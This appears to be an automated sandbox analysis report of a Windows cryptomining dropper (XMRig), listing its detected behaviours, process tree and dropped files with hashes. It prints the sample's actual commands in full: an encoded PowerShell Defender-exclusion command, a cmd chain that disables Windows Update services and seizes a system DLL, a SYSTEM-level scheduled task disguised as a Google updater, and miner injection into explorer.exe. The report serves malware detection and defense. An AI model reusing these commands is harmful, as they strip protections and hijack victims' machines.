Analysis

  • max time kernel
    300s
  • max time network
    266s
  • platform
    windows7_x64
  • resource
    win7-20220715-en
  • resource tags

    arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
  • submitted
    15-07-2022 22:15

General

  • Target

    17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe

  • Size

    7.6MB

  • MD5

    2169dc30793b25843551c51894827089

  • SHA1

    6ce2a8226221e154905127e88c0b022d4a89fac5

  • SHA256

    17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6

  • SHA512

    4731809e0f8aa22e3b90a5b81942b20997338ba91489ccc97e054300bdfc9604fb6e66a0ff83738cbee16138a55f4727f9fcddaba3cbcb78bb59bd14cd9e89bc

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner payload 14 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe
    "C:\Users\Admin\AppData\Local\Temp\17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:912
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1232
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYgBuAGQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdgAjAD4A"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1016
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
            PID:1584
            • C:\Windows\system32\sc.exe
              sc stop UsoSvc
              5⤵
              • Launches sc.exe
              PID:1988
            • C:\Windows\system32\sc.exe
              sc stop WaaSMedicSvc
              5⤵
              • Launches sc.exe
              PID:2028
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              5⤵
              • Launches sc.exe
              PID:1968
            • C:\Windows\system32\sc.exe
              sc stop bits
              5⤵
              • Launches sc.exe
              PID:1080
            • C:\Windows\system32\sc.exe
              sc stop dosvc
              5⤵
              • Launches sc.exe
              PID:1608
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
              5⤵
              • Modifies registry key
              PID:1664
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
              5⤵
              • Modifies registry key
              PID:568
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
              5⤵
              • Modifies security service
              • Modifies registry key
              PID:908
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
              5⤵
              • Modifies registry key
              PID:1688
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
              5⤵
              • Modifies registry key
              PID:1900
            • C:\Windows\system32\takeown.exe
              takeown /f C:\Windows\System32\WaaSMedicSvc.dll
              5⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:1880
            • C:\Windows\system32\icacls.exe
              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
              5⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:520
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:1952
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:1732
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:1636
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:1064
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
              5⤵
                PID:964
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                5⤵
                  PID:568
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                  5⤵
                    PID:1620
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                    5⤵
                      PID:1680
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                      5⤵
                        PID:2020
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                        5⤵
                          PID:992
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                          5⤵
                            PID:1944
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2016
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -hibernate-timeout-ac 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1640
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -hibernate-timeout-dc 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1216
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -standby-timeout-ac 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1680
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -standby-timeout-dc 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1260
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:856
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                            5⤵
                            • Creates scheduled task(s)
                            PID:1956
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1728
                          • C:\Windows\system32\schtasks.exe
                            schtasks /run /tn "GoogleUpdateTaskMachineQC"
                            5⤵
                              PID:1256
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ""C:\Windows\Temp\run.bat" "
                        2⤵
                        • Drops startup file
                        PID:556
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ""C:\Windows\Temp\lol.bat" "
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1772
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of WriteProcessMemory
                          PID:1644
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1644 CREDAT:275457 /prefetch:2
                            4⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:1212
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {C1EC3BD8-F256-466F-9D7D-309DD8E25285} S-1-5-18:NT AUTHORITY\System:Service:
                      1⤵
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:1972
                      • C:\Program Files\Google\Chrome\updater.exe
                        "C:\Program Files\Google\Chrome\updater.exe"
                        2⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of WriteProcessMemory
                        PID:1516
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
                          3⤵
                          • Drops file in Drivers directory
                          • Suspicious use of SetThreadContext
                          • Drops file in Program Files directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:572
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYgBuAGQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdgAjAD4A"
                            4⤵
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1876
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                            4⤵
                              PID:1216
                              • C:\Windows\system32\sc.exe
                                sc stop UsoSvc
                                5⤵
                                • Launches sc.exe
                                PID:868
                              • C:\Windows\system32\sc.exe
                                sc stop WaaSMedicSvc
                                5⤵
                                • Launches sc.exe
                                PID:1012
                              • C:\Windows\system32\sc.exe
                                sc stop wuauserv
                                5⤵
                                • Launches sc.exe
                                PID:1832
                              • C:\Windows\system32\sc.exe
                                sc stop bits
                                5⤵
                                • Launches sc.exe
                                PID:688
                              • C:\Windows\system32\sc.exe
                                sc stop dosvc
                                5⤵
                                • Launches sc.exe
                                PID:1256
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                5⤵
                                • Modifies registry key
                                PID:1988
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                5⤵
                                • Modifies registry key
                                PID:1352
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                5⤵
                                • Modifies registry key
                                PID:980
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                5⤵
                                • Modifies registry key
                                PID:1952
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                5⤵
                                • Modifies registry key
                                PID:556
                              • C:\Windows\system32\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                5⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1420
                              • C:\Windows\system32\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                5⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:1688
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                5⤵
                                • Modifies registry key
                                PID:1636
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                5⤵
                                • Modifies registry key
                                PID:1228
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                5⤵
                                • Modifies registry key
                                PID:852
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                5⤵
                                • Modifies registry key
                                PID:1944
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                5⤵
                                  PID:1964
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                  5⤵
                                    PID:848
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                    5⤵
                                      PID:1060
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                      5⤵
                                        PID:856
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                        5⤵
                                          PID:1640
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                          5⤵
                                            PID:796
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                            5⤵
                                              PID:1260
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                            4⤵
                                              PID:1112
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-ac 0
                                                5⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:992
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-dc 0
                                                5⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:520
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-ac 0
                                                5⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:636
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-dc 0
                                                5⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1348
                                            • C:\Windows\System32\conhost.exe
                                              C:\Windows\System32\conhost.exe "ivghlzjths"
                                              4⤵
                                                PID:1420
                                              • C:\Windows\explorer.exe
                                                C:\Windows\explorer.exe vvvdfgdxkkyjtyx1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8V1TH/rzrH+5OFPPAv1/5dL41W8yrIZ7P3dmb8QzXJF+
                                                4⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1640

                                        Network

                                        MITRE ATT&CK Enterprise v6

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Program Files\Google\Chrome\updater.exe
                                          Filesize

                                          7.3MB

                                          MD5

                                          84029d73b99cc7e8b7e80d61143a532f

                                          SHA1

                                          518c2673fb0de02b6eab1fb7f2a28e46761370ba

                                          SHA256

                                          e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772

                                          SHA512

                                          50ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62

                                        • C:\Program Files\Google\Chrome\updater.exe
                                          Filesize

                                          7.3MB

                                          MD5

                                          84029d73b99cc7e8b7e80d61143a532f

                                          SHA1

                                          518c2673fb0de02b6eab1fb7f2a28e46761370ba

                                          SHA256

                                          e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772

                                          SHA512

                                          50ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                          Filesize

                                          340B

                                          MD5

                                          33772e3cf9c142d3f80e4e977e06c9a0

                                          SHA1

                                          298b74ca67fe72c91dc03b17c55a6f9df9933c1f

                                          SHA256

                                          0f9acae17f0f62e119e5ba30472a09fe557d7fffe835b3ccaa51937bf8b7b5bc

                                          SHA512

                                          a0e13056481396f99d267a2cefef42e93e737e00ae9f65f56457887c45892a953c4bd52a8b46aa6e7b17deacbae3036a777b72109ff36ff1ec84f98fd213bbc9

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\3PEDW1FM.txt
                                          Filesize

                                          602B

                                          MD5

                                          29f523f911b9979ad80d63f3b5d132f9

                                          SHA1

                                          c9bcc9309f96d21af13742f8143996e47bdaaa67

                                          SHA256

                                          8b200dce92dff208465ed45f49514a818cd48362b619afe48e592703e876e554

                                          SHA512

                                          8f753a1a2b1452242d5e4109f03e2c86405e3adf94d4af5037197426f15d7ec41b1e5e5d6fcd603821fdf40b6d76ee30f0a86b261f67e82190c29332bf5b4852

                                        • C:\Windows\Temp\lol.bat
                                          Filesize

                                          59B

                                          MD5

                                          f580e0e80cc87b25e38ea2c0c8059d04

                                          SHA1

                                          299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                          SHA256

                                          9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                          SHA512

                                          5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                        • C:\Windows\Temp\run.bat
                                          Filesize

                                          98B

                                          MD5

                                          731afe244b2414169a5f630d52646e56

                                          SHA1

                                          e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                          SHA256

                                          6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                          SHA512

                                          84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                        • C:\Windows\Temp\setup.exe
                                          Filesize

                                          7.3MB

                                          MD5

                                          84029d73b99cc7e8b7e80d61143a532f

                                          SHA1

                                          518c2673fb0de02b6eab1fb7f2a28e46761370ba

                                          SHA256

                                          e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772

                                          SHA512

                                          50ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62

                                        • C:\Windows\Temp\setup.exe
                                          Filesize

                                          7.3MB

                                          MD5

                                          84029d73b99cc7e8b7e80d61143a532f

                                          SHA1

                                          518c2673fb0de02b6eab1fb7f2a28e46761370ba

                                          SHA256

                                          e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772

                                          SHA512

                                          50ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62

                                        • C:\Windows\system32\drivers\etc\hosts
                                          Filesize

                                          2KB

                                          MD5

                                          c5227366b7a688ff23b01788718251aa

                                          SHA1

                                          9795262e79c832ba49c744fcd1b1794c0ffb5c6a

                                          SHA256

                                          789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

                                          SHA512

                                          8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

                                        • \Program Files\Google\Chrome\updater.exe
                                          Filesize

                                          7.3MB

                                          MD5

                                          84029d73b99cc7e8b7e80d61143a532f

                                          SHA1

                                          518c2673fb0de02b6eab1fb7f2a28e46761370ba

                                          SHA256

                                          e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772

                                          SHA512

                                          50ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62

                                        • \Windows\Temp\setup.exe
                                          Filesize

                                          7.3MB

                                          MD5

                                          84029d73b99cc7e8b7e80d61143a532f

                                          SHA1

                                          518c2673fb0de02b6eab1fb7f2a28e46761370ba

                                          SHA256

                                          e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772

                                          SHA512

                                          50ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62

                                        • memory/520-113-0x0000000000000000-mapping.dmp
                                        • memory/556-58-0x0000000000000000-mapping.dmp
                                        • memory/556-123-0x0000000000000000-mapping.dmp
                                        • memory/572-137-0x0000000001150000-0x0000000001156000-memory.dmp
                                          Filesize

                                          24KB

                                        • memory/636-116-0x0000000000000000-mapping.dmp
                                        • memory/688-115-0x0000000000000000-mapping.dmp
                                        • memory/796-135-0x0000000000000000-mapping.dmp
